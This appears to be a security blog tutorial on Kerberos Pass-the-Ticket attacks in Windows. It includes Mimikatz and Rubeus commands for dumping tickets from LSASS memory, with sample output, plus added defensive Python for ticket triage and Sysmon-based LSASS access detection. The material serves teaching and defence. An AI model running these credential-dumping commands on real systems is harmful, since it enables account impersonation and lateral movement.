Pass the Ticket (PtT) from Windows | StrawHat Hackers
Pass the Ticket (PtT) Attack in Windows
Pass the Ticket (PtT) is a lateral movement technique in Active Directory. Instead of relying on NTLM hashes, attackers steal and reuse Kerberos tickets to access other systems without being prompted for credentials.
Kerberos Protocol Overview
Kerberos is an authentication system that allows users to log in once and access multiple services without repeatedly entering their passwords. It achieves this through the use of tickets.
How Kerberos Works
1. Logging in → Obtaining a TGT (Ticket Granting Ticket)
- The computer sends a login request to the Domain Controller (DC).
- The DC verifies the user's identity and issues a TGT.
2. Requesting a Service → Obtaining a TGS (Ticket Granting Service Ticket)
- When the user attempts to access a service (e.g., an MSSQL database), the TGT is presented to the DC.
- The DC provides a TGS, which grants access to the requested service.
3. Accessing the Service → Using the TGS
- The computer presents the TGS to the service.
- The service validates the ticket and grants access without requesting a password.
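The three exchanges above, as an added example that is not part of the original post: a toy Python model of the Kerberos flow with constructed keys and users, where "sealing" a ticket with HMAC stands in for encrypting it under the owner's long-term key. It shows the point that makes ticket theft work: in step 3 the service checks the ticket with its own key and never talks back to the DC, so whoever holds a valid ticket is accepted as the user named in it. It also shows the two limits a defender should know, that a ticket stops working at its EndTime and that a ticket for one service does not verify at another. Names such as `MSSQLSvc/sql01.example.local` and `alice` are made up for the demo.

```python
import hashlib
import hmac
import json

# Constructed demo keys (stand-ins for the long-term keys the KDC and each
# service derive from their account passwords). "krbtgt" seals every TGT.
KEYS = {
    "krbtgt": b"krbtgt-key-constructed",
    "MSSQLSvc/sql01.example.local": b"sql-service-key-constructed",
    "cifs/fs01.example.local": b"file-server-key-constructed",
}
USERS = {"alice": b"alice-password-constructed"}
TEN_HOURS = 10 * 3600  # default ticket lifetime in a Windows domain


def seal(payload: dict, key: bytes) -> str:
    """Stand-in for ticket encryption: JSON body plus an HMAC under the owner's key."""
    body = json.dumps(payload, sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "|" + tag


def open_ticket(ticket: str, key: bytes, now: float) -> dict:
    """Check the seal and the validity window; raise if either fails."""
    body, tag = ticket.rsplit("|", 1)
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("ticket was not sealed with this key")
    payload = json.loads(body)
    if not payload["start"] <= now < payload["end"]:
        raise ValueError("ticket is outside its validity window")
    return payload


# Step 1 (AS exchange): the DC checks the password once and returns a TGT that
# only the DC can open, because it is sealed with the krbtgt key.
def dc_issue_tgt(user: str, password: bytes, now: float) -> str:
    if USERS.get(user) != password:
        raise PermissionError("bad password")
    return seal({"user": user, "service": "krbtgt", "start": now, "end": now + TEN_HOURS}, KEYS["krbtgt"])


# Step 2 (TGS exchange): the DC opens the TGT and issues a service ticket sealed
# with that service's key. The password is not asked for again.
def dc_issue_tgs(tgt: str, service: str, now: float) -> str:
    holder = open_ticket(tgt, KEYS["krbtgt"], now)["user"]
    return seal({"user": holder, "service": service, "start": now, "end": now + TEN_HOURS}, KEYS[service])


# Step 3 (AP exchange): the service opens the ticket with its own key and never
# contacts the DC. Whoever presents a valid, unexpired ticket is accepted as
# the user named inside it, which is exactly what Pass the Ticket relies on.
def service_accept(tgs: str, service: str, now: float) -> str:
    payload = open_ticket(tgs, KEYS[service], now)
    if payload["service"] != service:
        raise ValueError("ticket was issued for a different service")
    return payload["user"]


def service_accepts(tgs: str, service: str, now: float) -> bool:
    """Boolean wrapper used to probe the limits of a ticket."""
    try:
        service_accept(tgs, service, now)
        return True
    except ValueError:
        return False


def demo(now: float) -> dict:
    """Run the three exchanges and probe where the ticket stops working."""
    tgt = dc_issue_tgt("alice", USERS["alice"], now)
    tgs = dc_issue_tgs(tgt, "MSSQLSvc/sql01.example.local", now)
    return {
        "accepted_as": service_accept(tgs, "MSSQLSvc/sql01.example.local", now),
        # Same ticket one hour after EndTime: refused. Ticket lifetime bounds
        # how long a copied ticket remains usable.
        "after_expiry": service_accepts(tgs, "MSSQLSvc/sql01.example.local", now + TEN_HOURS + 3600),
        # Same ticket presented to a different service: the seal does not verify.
        "at_other_service": service_accepts(tgs, "cifs/fs01.example.local", now),
    }


if __name__ == "__main__":
    print(demo(1_700_000_000.0))
```

Real Kerberos encrypts the ticket rather than appending a MAC, and the client also proves possession of the session key with an authenticator, but the validation decision at the service is local in both cases: signature (or decryption) under the service key plus the time window.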
Pass the Ticket (PtT) Attack
To perform this attack, a valid ticket (TGT or TGS) is required.
How to Steal Kerberos Tickets
On a compromised machine, tools like Mimikatz and Rubeus can extract Kerberos tickets from memory. These tickets are stored in the LSASS process on Windows.
Method 1: Using Mimikatz
Steps to Extract Tickets with Mimikatz
1. Open PowerShell and navigate to the directory containing mimikatz.exe.
cd C:\path\to\mimikatz
.\mimikatz.exe
2. Grant privilege to interact with LSASS:
privilege::debug
- If successful, it returns: Privilege '20' ok
3. Extract all Kerberos tickets from memory:
sekurlsa::tickets /export
- This command saves the extracted tickets as .kirbi files.
Types of Kerberos Tickets
1. Computer Account Tickets
- If the user name in the ticket ends with $, it belongs to a computer account.
- Example: DC01$ (a ticket belonging to the domain controller's computer account).
2. User Account Tickets
- If the ticket name contains a username followed by @, it belongs to a user account.
Why This Matters
- Computer account tickets enable machines to communicate with Active Directory.
- User account tickets allow access to services like file shares or web applications.
- Attackers with admin access can steal tickets and use them for Pass-the-Ticket (PtT) attacks to impersonate users.
Method 2: Exporting Kerberos Tickets Using Rubeus
Unlike Mimikatz, which writes .kirbi files, Rubeus prints the extracted tickets to the console in Base64 form.
Steps to Extract Tickets with Rubeus
1. Navigate to the tool's directory on the compromised machine.
2. Run the following command to dump Kerberos tickets:
Rubeus.exe dump /nowrap
Example Output:
ServiceName : krbtgt/inlanefreight.htb
ServiceRealm : inlanefreight.htb
UserName : DC01$
UserRealm : inlanefreight.htb
StartTime : 7/12/2022 9:39:54 AM
EndTime : 7/12/2022 7:39:54 PM
RenewTill : 7/19/2022 9:39:54 AM
Flags : renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : KWBMpM4BjenjTniwH0xw8FhvbFSf+SBVZJJcWgUKi3w=
Base64EncodedTicket : doIE1jCCBNKgAwIBBaEDAgEWooID...
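An added Python example (not code from the original post or from the Rubeus project) covering both the ticket-type classification above and the dump layout just shown, written from the incident-response side: given a Rubeus-style dump recovered from a compromised host, parse each ticket block, classify the account as computer (name ends with $) or user, tell TGTs (service krbtgt/...) from service tickets, and work out how long each ticket was still usable at the time of analysis. The sample dump is constructed in the layout Rubeus prints, with the key and ticket fields replaced by placeholders; the account jsmith and the cifs service are made up.

```python
import re
from datetime import datetime

# Constructed sample in the layout Rubeus prints; key and ticket bytes are placeholders.
SAMPLE_DUMP = """\
ServiceName : krbtgt/inlanefreight.htb
ServiceRealm : inlanefreight.htb
UserName : DC01$
UserRealm : inlanefreight.htb
StartTime : 7/12/2022 9:39:54 AM
EndTime : 7/12/2022 7:39:54 PM
RenewTill : 7/19/2022 9:39:54 AM
Flags : renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : <key-placeholder>
Base64EncodedTicket : <ticket-placeholder>

ServiceName : krbtgt/inlanefreight.htb
ServiceRealm : inlanefreight.htb
UserName : jsmith
UserRealm : inlanefreight.htb
StartTime : 7/12/2022 8:00:00 AM
EndTime : 7/12/2022 6:00:00 PM
RenewTill : 7/19/2022 8:00:00 AM
Flags : renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : <key-placeholder>
Base64EncodedTicket : <ticket-placeholder>

ServiceName : cifs/fs01.inlanefreight.htb
ServiceRealm : inlanefreight.htb
UserName : jsmith
UserRealm : inlanefreight.htb
StartTime : 7/12/2022 1:30:00 AM
EndTime : 7/12/2022 11:30:00 AM
RenewTill : 7/19/2022 1:30:00 AM
Flags : renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : <key-placeholder>
Base64EncodedTicket : <ticket-placeholder>
"""

FIELD_RE = re.compile(r"^\s*(\S+)\s*:\s*(.*?)\s*$")
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"  # the US-style timestamps Rubeus prints


def parse_rubeus_dump(text):
    """Split the dump into blank-line separated blocks of 'Field : value' lines."""
    tickets = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1)] = m.group(2)
        if "ServiceName" in fields:
            tickets.append(fields)
    return tickets


def account_kind(user_name):
    """Computer accounts end with $; everything else is treated as a user."""
    return "computer" if user_name.endswith("$") else "user"


def triage(text, now):
    """One row per ticket: who it belongs to, what it is, and how long it was
    still valid relative to the analysis time (negative = already expired)."""
    rows = []
    for t in parse_rubeus_dump(text):
        end = datetime.strptime(t["EndTime"], TIME_FMT)
        service = t["ServiceName"]
        rows.append({
            "account": t["UserName"],
            "kind": account_kind(t["UserName"]),
            "ticket": "TGT" if service.startswith("krbtgt/") else "TGS",
            "service": service,
            "seconds_left": int((end - now).total_seconds()),
            "renewable": "renewable" in t.get("Flags", ""),
            "renew_till": datetime.strptime(t["RenewTill"], TIME_FMT),
            "key_type": t.get("KeyType", ""),
        })
    return rows


def accounts_exposed(rows):
    """Accounts with at least one ticket that was still usable at analysis time."""
    return sorted({r["account"] for r in rows if r["seconds_left"] > 0})


if __name__ == "__main__":
    for row in triage(SAMPLE_DUMP, datetime(2022, 7, 12, 12, 0, 0)):
        print(row)
```

A caveat that matters for the response: a ticket stays valid until its EndTime regardless of a later password reset for the user, and a renewable ticket can be renewed up to RenewTill, so the list from `accounts_exposed` is a lower bound on what needs attention rather than a list that a password change alone clears.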
Conclusion
Pass the Ticket (PtT) attacks allow adversaries to impersonate users and move laterally within a network. By stealing and reusing Kerberos tickets, attackers can access systems without needing credentials. Defenders should monitor LSASS access and use tools like Windows Defender Credential Guard to protect against such attacks.
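The monitoring the conclusion recommends, as an added example that is not part of the original post: Sysmon Event ID 10 (ProcessAccess) records which process opened a handle to which other process and with what access mask, and the page's extraction step works by reading LSASS memory, which needs PROCESS_VM_READ (0x0010) in that mask. The Python below runs over constructed events that use Sysmon's real EventData field names (SourceImage, TargetImage, GrantedAccess) and alerts on any non-allowlisted process that obtains read access to lsass.exe. The allowlist and the severity split are assumptions to be tuned per environment, not a published baseline, and the paths are made up.

```python
from typing import Dict, List

# Access-mask bits from the Windows process access rights; Sysmon logs the
# whole mask as a hex string in GrantedAccess.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Example allowlist of processes that routinely open lsass.exe with read access
# (an assumption for this demo; tune it against your own environment's baseline).
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon Event ID 10 records using the EventData field names Sysmon
# writes. Paths and masks are made up for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": "10", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": "10", "SourceImage": r"C:\Users\bob\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": "10", "SourceImage": r"C:\Users\bob\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe"},
]


def is_lsass(path: str) -> bool:
    return path.lower().endswith(r"\lsass.exe")


def detect_lsass_access(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per ProcessAccess event in which an unexpected process
    obtains read access to LSASS memory."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "10" or not is_lsass(ev.get("TargetImage", "")):
            continue
        mask = int(ev["GrantedAccess"], 16)
        if not mask & PROCESS_VM_READ:
            continue  # query-only handles such as 0x1000 are routine
        source = ev["SourceImage"]
        if source.lower() in ALLOWED_SOURCES:
            continue
        alerts.append({
            "source": source,
            "granted_access": hex(mask),
            # write access (or a full-access handle) on LSASS is rarer than a read
            "severity": "high" if mask & PROCESS_VM_WRITE else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_lsass_access(SAMPLE_EVENTS):
        print(alert)
```

Two practical notes: Sysmon only emits Event ID 10 for targets its configuration includes, so lsass.exe has to be in the ProcessAccess rule set before this logic sees anything; and with Credential Guard enabled the secrets move into an isolated process that LSASS itself cannot read, which is why the page lists it as the mitigation alongside monitoring.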
content created by Suhail